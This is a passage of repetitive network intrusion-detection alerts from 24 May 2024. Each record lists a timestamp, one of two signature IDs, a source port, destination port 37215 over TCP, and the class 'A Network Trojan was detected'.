              Timestamp:05/24/24-10:58:56.099798
              SID:2835222
              Source Port:50058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639851
              SID:2835222
              Source Port:33428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.059928
              SID:2835222
              Source Port:43496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235569
              SID:2835222
              Source Port:42854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122809
              SID:2829579
              Source Port:42026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.380280
              SID:2835222
              Source Port:36990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397810
              SID:2835222
              Source Port:37900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878128
              SID:2835222
              Source Port:53752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054267
              SID:2835222
              Source Port:33952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664455
              SID:2829579
              Source Port:53978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.096745
              SID:2829579
              Source Port:52322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340906
              SID:2829579
              Source Port:45404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857492
              SID:2835222
              Source Port:42296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923881
              SID:2835222
              Source Port:47996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154182
              SID:2835222
              Source Port:36886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167536
              SID:2829579
              Source Port:59264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492141
              SID:2835222
              Source Port:52034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.377174
              SID:2835222
              Source Port:52344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102369
              SID:2835222
              Source Port:39562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.991884
              SID:2835222
              Source Port:54250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355014
              SID:2835222
              Source Port:38280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764072
              SID:2835222
              Source Port:57886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054381
              SID:2835222
              Source Port:41998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115114
              SID:2829579
              Source Port:50626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187926
              SID:2829579
              Source Port:38994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368635
              SID:2829579
              Source Port:50372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.431578
              SID:2829579
              Source Port:41550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.501882
              SID:2829579
              Source Port:37744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536461
              SID:2829579
              Source Port:33146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727058
              SID:2829579
              Source Port:51730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502350
              SID:2835222
              Source Port:53078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049854
              SID:2835222
              Source Port:38788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548201
              SID:2835222
              Source Port:50430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489543
              SID:2835222
              Source Port:35784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.586525
              SID:2835222
              Source Port:41762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485770
              SID:2835222
              Source Port:45248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430526
              SID:2829579
              Source Port:38414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449127
              SID:2829579
              Source Port:37754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550630
              SID:2835222
              Source Port:49100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695243
              SID:2829579
              Source Port:36372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329425
              SID:2829579
              Source Port:52138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.768287
              SID:2829579
              Source Port:42226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120733
              SID:2835222
              Source Port:54242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502949
              SID:2829579
              Source Port:47352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395464
              SID:2829579
              Source Port:51616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.599163
              SID:2835222
              Source Port:54924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574473
              SID:2835222
              Source Port:50934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100973
              SID:2829579
              Source Port:58718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055343
              SID:2835222
              Source Port:49384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.108824
              SID:2835222
              Source Port:48774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.109266
              SID:2835222
              Source Port:53670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540582
              SID:2835222
              Source Port:60676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278202
              SID:2835222
              Source Port:47218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270474
              SID:2829579
              Source Port:46118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724504
              SID:2829579
              Source Port:40764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481435
              SID:2835222
              Source Port:55316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.747826
              SID:2829579
              Source Port:34060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.747570
              SID:2829579
              Source Port:49314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522216
              SID:2835222
              Source Port:34292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162268
              SID:2829579
              Source Port:46338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053486
              SID:2829579
              Source Port:55696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.833214
              SID:2835222
              Source Port:55410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078152
              SID:2829579
              Source Port:43086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100873
              SID:2829579
              Source Port:52262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361317
              SID:2829579
              Source Port:41604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.630602
              SID:2835222
              Source Port:60262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585028
              SID:2829579
              Source Port:55150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663700
              SID:2835222
              Source Port:34820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664732
              SID:2829579
              Source Port:47918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975655
              SID:2829579
              Source Port:59922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481419
              SID:2829579
              Source Port:59212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112596
              SID:2829579
              Source Port:37008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.119955
              SID:2835222
              Source Port:57138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.526885
              SID:2829579
              Source Port:45060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537770
              SID:2829579
              Source Port:36134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858408
              SID:2835222
              Source Port:56000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250723
              SID:2829579
              Source Port:33456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186598
              SID:2835222
              Source Port:54128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637846
              SID:2829579
              Source Port:33494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.429799
              SID:2829579
              Source Port:48468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.409149
              SID:2835222
              Source Port:54212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055559
              SID:2835222
              Source Port:60414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188405
              SID:2829579
              Source Port:38346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098772
              SID:2835222
              Source Port:51414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574473
              SID:2835222
              Source Port:43724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097828
              SID:2835222
              Source Port:51146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078091
              SID:2829579
              Source Port:43744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.459029
              SID:2835222
              Source Port:50298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055431
              SID:2829579
              Source Port:46880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601271
              SID:2829579
              Source Port:35524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802624
              SID:2829579
              Source Port:35598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456388
              SID:2829579
              Source Port:59172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725516
              SID:2829579
              Source Port:47904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880979
              SID:2835222
              Source Port:34570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.973625
              SID:2829579
              Source Port:53524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234693
              SID:2829579
              Source Port:45322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662534
              SID:2835222
              Source Port:33620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116640
              SID:2829579
              Source Port:47484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425859
              SID:2829579
              Source Port:59644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099899
              SID:2829579
              Source Port:56328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573504
              SID:2829579
              Source Port:58584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457728
              SID:2835222
              Source Port:47168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188405
              SID:2829579
              Source Port:40406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103155
              SID:2835222
              Source Port:56542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329768
              SID:2829579
              Source Port:34166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589263
              SID:2835222
              Source Port:37274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536210
              SID:2829579
              Source Port:52720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153060
              SID:2829579
              Source Port:48718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504560
              SID:2835222
              Source Port:57572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.698637
              SID:2835222
              Source Port:47516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.377135
              SID:2835222
              Source Port:47874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797862
              SID:2835222
              Source Port:57738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570556
              SID:2835222
              Source Port:43590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606298
              SID:2829579
              Source Port:39398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.986379
              SID:2835222
              Source Port:37946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802539
              SID:2829579
              Source Port:55826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574799
              SID:2829579
              Source Port:46448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625681
              SID:2829579
              Source Port:32956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.160537
              SID:2829579
              Source Port:50016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535759
              SID:2835222
              Source Port:33120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763876
              SID:2835222
              Source Port:50348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208344
              SID:2829579
              Source Port:35910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.209597
              SID:2829579
              Source Port:38734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538092
              SID:2835222
              Source Port:54390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343541
              SID:2835222
              Source Port:56478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157770
              SID:2829579
              Source Port:38822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341586
              SID:2835222
              Source Port:58512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624367
              SID:2829579
              Source Port:46450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.832432
              SID:2835222
              Source Port:39102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928874
              SID:2835222
              Source Port:40452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.103692
              SID:2829579
              Source Port:34228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535775
              SID:2835222
              Source Port:52346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539878
              SID:2835222
              Source Port:46058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201678
              SID:2835222
              Source Port:55364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797259
              SID:2829579
              Source Port:51556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111461
              SID:2835222
              Source Port:48252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155000
              SID:2835222
              Source Port:53538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537651
              SID:2835222
              Source Port:54830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.964015
              SID:2835222
              Source Port:41840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.979424
              SID:2829579
              Source Port:48420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329724
              SID:2829579
              Source Port:55070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303010
              SID:2829579
              Source Port:41336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725516
              SID:2835222
              Source Port:39526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378122
              SID:2829579
              Source Port:43878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343483
              SID:2829579
              Source Port:36794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049361
              SID:2835222
              Source Port:48262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278893
              SID:2835222
              Source Port:52782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447239
              SID:2829579
              Source Port:56088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579644
              SID:2829579
              Source Port:50340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.122510
              SID:2835222
              Source Port:45602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727351
              SID:2829579
              Source Port:41692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116562
              SID:2829579
              Source Port:59818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576449
              SID:2829579
              Source Port:37408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570666
              SID:2829579
              Source Port:47412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727035
              SID:2829579
              Source Port:45368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061484
              SID:2835222
              Source Port:53642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.579919
              SID:2829579
              Source Port:57684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152945
              SID:2829579
              Source Port:39608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195125
              SID:2829579
              Source Port:44752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114494
              SID:2835222
              Source Port:45434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537061
              SID:2835222
              Source Port:59188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920366
              SID:2829579
              Source Port:58104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.349913
              SID:2835222
              Source Port:50052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279587
              SID:2829579
              Source Port:58340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347558
              SID:2829579
              Source Port:40800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112805
              SID:2829579
              Source Port:51718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483632
              SID:2835222
              Source Port:48386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857146
              SID:2829579
              Source Port:35528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.390674
              SID:2835222
              Source Port:60056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165075
              SID:2835222
              Source Port:40482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420943
              SID:2835222
              Source Port:33128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.763254
              SID:2829579
              Source Port:33042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.771836
              SID:2835222
              Source Port:55210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113297
              SID:2835222
              Source Port:59636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199169
              SID:2835222
              Source Port:49676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152779
              SID:2835222
              Source Port:53146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885240
              SID:2835222
              Source Port:54972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624110
              SID:2829579
              Source Port:35282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671552
              SID:2829579
              Source Port:41062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118556
              SID:2835222
              Source Port:59524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857369
              SID:2829579
              Source Port:37580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727905
              SID:2835222
              Source Port:54168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725697
              SID:2835222
              Source Port:38556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400715
              SID:2835222
              Source Port:46240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430426
              SID:2835222
              Source Port:54182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303424
              SID:2829579
              Source Port:59718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727291
              SID:2835222
              Source Port:38380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200699
              SID:2829579
              Source Port:35434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053618
              SID:2829579
              Source Port:50128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105738
              SID:2835222
              Source Port:48960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355151
              SID:2829579
              Source Port:50588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.697429
              SID:2829579
              Source Port:48654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.127530
              SID:2829579
              Source Port:42954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.119687
              SID:2835222
              Source Port:49744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575785
              SID:2829579
              Source Port:50090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057383
              SID:2829579
              Source Port:40450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575120
              SID:2835222
              Source Port:34120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097268
